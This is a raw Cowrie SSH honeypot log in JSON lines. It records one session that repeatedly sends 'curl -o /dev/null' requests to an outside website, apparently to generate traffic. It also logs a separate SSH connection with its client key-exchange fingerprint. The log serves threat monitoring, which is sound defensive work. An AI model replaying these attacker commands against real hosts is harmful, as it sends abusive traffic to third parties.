{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.942159Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.981080Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.982078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.019166Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.020329Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.036084Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.037239Z","src_ip":"41.223.30.169","session":"104b5910f115"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.059534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.060652Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.098890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.099774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.150231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.151228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.188796Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.189766Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.226564Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.227473Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.266759Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.267742Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.305301Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.306201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.347377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.348346Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.436790Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.437698Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.474230Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.475294Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.525138Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.526039Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.565823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.566765Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.610361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.611265Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.682847Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.684027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.721267Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.722108Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.759762Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.760595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.801576Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.802452Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:12.986083Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:12.986969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.024400Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.025232Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.061795Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.062588Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.101275Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.102093Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.146249Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.147070Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.214533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.215347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.280432Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.281228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.335368Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.336148Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.423447Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.424246Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.508856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.509722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.558276Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.559082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.595361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.596099Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.633176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.633979Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.706558Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.707364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.747107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.747876Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"180.108.64.6","src_port":36926,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cbbd393f722","protocol":"ssh","message":"New connection: 180.108.64.6:36926 (1.2.3.4:22) [session: 7cbbd393f722]","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.754286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.755114Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.791330Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.792077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.837700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.839498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.879884Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.880805Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.920889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.921682Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:13.960560Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.962239Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:47:13.966641Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.000604Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.001962Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.076220Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.076990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.116111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.117159Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.154971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.155913Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.192306Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.193157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.230887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.232058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.269216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.269933Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.325151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.325954Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.363446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.364788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.403154Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.403983Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.443802Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.444589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.510311Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.511429Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.550489Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.551308Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.590355Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.591189Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.628081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.629192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.665839Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.666930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.713709Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.714552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.773229Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.774298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.822994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.823758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
